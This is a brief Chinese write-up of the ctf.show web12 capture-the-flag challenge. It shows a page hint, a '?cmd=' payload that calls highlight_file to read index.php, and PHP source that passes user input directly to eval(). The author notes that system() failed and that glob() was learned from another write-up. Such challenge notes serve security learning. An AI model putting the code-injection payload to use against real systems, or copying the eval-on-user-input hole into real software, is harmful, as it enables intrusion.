f12提示:
<!-- hit:?cmd= -->
传参?cmd=hightlight_file(“index.php”);
得到源码:
<?php
error_reporting(0);
?>
<html lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width minimum-scale=1.0 maximum-scale=1.0 initial-scale=1.0" />
<title>ctf.show_web12</title>
</head>
<body>
<center>
<h2>ctf.show_web12</h2>
<h4>where is the flag?</h4>
<!-- hit:?cmd= -->
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>
</body>
</html>
传system()不行。。。。。?
看wp,glob()函数,学到了